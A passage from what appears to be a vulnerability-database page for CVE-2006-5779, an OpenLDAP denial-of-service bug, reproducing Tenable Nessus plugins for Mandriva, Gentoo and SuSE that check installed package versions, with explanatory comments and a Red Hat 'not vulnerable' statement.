      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
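    # Preconditions: each failed test ends the script through audit() with a
    # reason code instead of letting an out-of-scope host look patched.
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    # Audit text corrected: the distribution name was misspelled "Mandake",
    # which did not match the spelling used in the architecture message below.
    if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandrake Linux");
    if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    # Exact architecture match; anything else is audited out, not reported.
    if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);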
    
    
    # Count installed packages that are below the fixed build for their
    # release. The fixed builds are distribution packages (2.3.6-4.3 for 2006.0,
    # 2.3.27-1.1 for 2007.0), so the test is made against package versions, not
    # against the upstream release number. rpm_check() comes from rpm.inc (not
    # shown).
    flag = 0;
    
    # Mandriva 2006.0: 64-bit libraries, 32-bit libraries, then the
    # architecture-independent entries.
    if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-static-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-static-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"openldap-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"openldap-clients-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"openldap-doc-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    if (rpm_check(release:"MDK2006.0", reference:"openldap-servers-2.3.6-4.3.20060mdk", yank:"mdk")) flag++;
    
    # Mandriva 2007.0: same package set.
    if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-static-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-static-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", reference:"openldap-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", reference:"openldap-clients-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", reference:"openldap-doc-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    if (rpm_check(release:"MDK2007.0", reference:"openldap-servers-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++;
    
    # Outdated package found: report at host level (port 0); the package detail
    # is attached only when report verbosity is above zero.
    if (flag)
    {
      if (report_verbosity > 0)
        security_warning(port:0, extra:rpm_report_get());
      else
        security_warning(0);
      exit(0);
    }
    
    # Reached only when nothing was flagged, because the branch above exits.
    audit(AUDIT_HOST_NOT, "affected");
    
  • NASL family: Gentoo Local Security Checks
    NASL id: GENTOO_GLSA-200611-25.NASL
    description: The remote host is affected by the vulnerability described in GLSA-200611-25 (OpenLDAP: Denial of Service vulnerability). Evgeny Legerov has discovered that the truncation of an incoming authcid longer than 255 characters and ending with a space as the 255th character will lead to an improperly computed name length. This will trigger an assert in the libldap code. Impact: By sending a BIND request with a specially crafted authcid parameter to an OpenLDAP service, a remote attacker can cause the service to crash. Workaround: There is no known workaround at this time.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 23747
    published: 2006-11-30
    reporter: This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/23747
    title: GLSA-200611-25 : OpenLDAP: Denial of Service vulnerability
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 200611-25.
    #
    # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    # Registration branch: when the script is loaded with `description` set,
    # only this block runs. It records the plugin's metadata and exits before
    # any check is performed.
    if (description)
    {
      script_id(23747);
      script_version("1.13");
      script_cvs_date("Date: 2019/08/02 13:32:43");
    
      # Identifiers a finding can be correlated on: the CVE and the Gentoo advisory.
      script_cve_id("CVE-2006-5779");
      script_xref(name:"GLSA", value:"200611-25");
    
      script_name(english:"GLSA-200611-25 : OpenLDAP: Denial of Service vulnerability");
      # The summary names the method: installed-package data is compared.
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      # Advisory text: trigger condition (authcid longer than 255 characters with
      # a space as the 255th), impact (service crash) and the absence of a workaround.
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-200611-25
    (OpenLDAP: Denial of Service vulnerability)
    
        Evgeny Legerov has discovered that the truncation of an incoming
        authcid longer than 255 characters and ending with a space as the 255th
        character will lead to an improperly computed name length. This will
        trigger an assert in the libldap code.
      
    Impact :
    
        By sending a BIND request with a specially crafted authcid parameter to
        an OpenLDAP service, a remote attacker can cause the service to crash.
      
    Workaround :
    
        There is no known workaround at this time."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/200611-25"
      );
      # Remediation is a package upgrade; the advisory lists no workaround.
      script_set_attribute(
        attribute:"solution", 
        value:
    "All OpenLDAP users should upgrade to the latest version:
        # emerge --sync
        # emerge --ask --oneshot --verbose 'net-nds/openldap'"
      );
      # CVSS v2 base vector: network-reachable, low complexity, no authentication;
      # the only impact is partial loss of availability (the crash described above).
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      # "local": the verdict comes from data collected on the host, not from
      # probing the LDAP service over the network.
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:openldap");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/11/30");
      script_set_attribute(attribute:"vuln_publication_date", value:"2006/11/06");
      script_end_attributes();
    
      # ACT_GATHER_INFO: an information-gathering plugin.
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
      script_family(english:"Gentoo Local Security Checks");
    
      # Declares ssh_get_info.nasl as a prerequisite and lists the KB items the
      # check needs (presumably populated by that dependency -- confirm).
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    # Preconditions: local checks enabled, a Gentoo release recorded, and a
    # package list collected. A missing item ends the run through audit(), so
    # "no finding" here can mean "not assessed" rather than "not vulnerable".
    if (!get_kb_item("Host/local_checks_enabled"))
    {
      audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    }
    if (!get_kb_item("Host/Gentoo/release"))
    {
      audit(AUDIT_OS_NOT, "Gentoo");
    }
    if (!get_kb_item("Host/Gentoo/qpkg-list"))
    {
      audit(AUDIT_PACKAGE_LIST_MISSING);
    }

    flag = 0;

    # net-nds/openldap below 2.3.27-r3 is flagged. 2.3.27-r3 and later count as
    # fixed, as do the listed 2.2.28 and 2.1.30 revisions (the "rge" entries;
    # presumably "same version, revision at least" -- confirm against qpkg.inc).
    # The fixed Gentoo revision is lower than the upstream fixed version in the
    # CVE summary (2.3.29), presumably a backported fix, so comparing against
    # the upstream number alone would misjudge patched hosts.
    if (qpkg_check(
          package:"net-nds/openldap",
          unaffected:make_list("ge 2.3.27-r3", "rge 2.2.28-r5", "rge 2.1.30-r8"),
          vulnerable:make_list("lt 2.3.27-r3")))
    {
      flag++;
    }

    if (!flag)
    {
      # Nothing flagged: say whether the package was compared and found fixed,
      # or was not installed at all.
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "OpenLDAP");
    }
    else
    {
      # A hit reflects the installed package only; these lines do not check
      # whether the LDAP service is running or reachable.
      if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());
      else security_warning(0);
      exit(0);
    }
    
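  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_OPENLDAP2-CLIENT-2291.NASL
    description: OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash. (CVE-2006-5779)
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 29537
    published: 2007-12-13
    reporter: This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/29537
    title: SuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291)
    code: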
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The text description of this plugin is (C) Novell, Inc.
    #
    
    include("compat.inc");
    
    # Registration branch: when the script is loaded with `description` set,
    # only this block runs. It records the plugin's metadata and exits before
    # any check is performed.
    if (description)
    {
      script_id(29537);
      script_version ("1.12");
      script_cvs_date("Date: 2019/10/25 13:36:28");
    
      # The CVE is the only cross-reference registered here.
      script_cve_id("CVE-2006-5779");
    
      script_name(english:"SuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291)");
      # The summary names the method: installed rpm data is compared.
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote SuSE 10 host is missing a security-related patch."
      );
      # The description locates the bug in libldap's strval2strlen() and names
      # the OpenLDAP server as the application most likely to crash.
      script_set_attribute(
        attribute:"description", 
        value:
    "OpenLDAP libldap's strval2strlen() function contained a bug when
    processing the authcid string of certain Bind Requests, which could
    allow attackers to cause an affected application (especially the
    OpenLDAP Server) to crash. (CVE-2006-5779)"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://support.novell.com/security/cve/CVE-2006-5779.html"
      );
      script_set_attribute(attribute:"solution", value:"Apply ZYPP patch number 2291.");
      # CVSS v2 base vector: network-reachable, low complexity, no authentication;
      # the only impact is partial loss of availability.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      # "local": the verdict comes from data collected on the host, not from
      # probing the LDAP service over the network.
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/12/13");
      script_end_attributes();
    
      # ACT_GATHER_INFO: an information-gathering plugin.
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      # Declares ssh_get_info.nasl as a prerequisite and lists the KB items the
      # check needs, including the CPU architecture.
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("rpm.inc");
    
    
    # Preconditions: local checks enabled, a SuSE release recorded, and an rpm
    # list collected. Each failure exits with a message instead of a finding.
    if (!get_kb_item("Host/local_checks_enabled"))
    {
      exit(0, "Local checks are not enabled.");
    }
    if (!get_kb_item("Host/SuSE/release"))
    {
      exit(0, "The host is not running SuSE.");
    }
    if (!get_kb_item("Host/SuSE/rpm-list"))
    {
      exit(1, "Could not obtain the list of installed packages.");
    }

    # Architecture gate: only x86_64 and i386..i686 hosts are evaluated. Any
    # other architecture exits with status 1, which means the host was not
    # assessed, not that it was cleared.
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu))
    {
      exit(1, "Failed to determine the architecture type.");
    }
    if (!(cpu >< "x86_64" || cpu =~ "^i[3-6]86$"))
    {
      exit(1, "Local checks for SuSE 10 on the '"+cpu+"' architecture have not been implemented.");
    }

    # Only openldap2-client, plus its 32-bit variant on x86_64, is compared, and
    # only for SLED10/SLES10 at service pack 0. The plugin description names
    # the OpenLDAP server as the main crash target; no server package is looked
    # at here, so server exposure has to be established by a separate check.
    flag = 0;
    foreach sle_release (make_list("SLED10", "SLES10"))
    {
      if (rpm_check(release:sle_release, sp:0, reference:"openldap2-client-2.3.19-18.11")) flag++;
      if (rpm_check(release:sle_release, sp:0, cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11")) flag++;
    }

    if (!flag)
    {
      exit(0, "The host is not affected.");
    }
    else
    {
      # At least one installed package is older than the reference build.
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    

Statements

contributor: Joshua Bressers
lastmodified: 2007-03-14
organization: Red Hat
statement: Not Vulnerable. The OpenLDAP versions shipped with Red Hat Enterprise Linux 4 and earlier do not contain the vulnerable code in question. Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.

References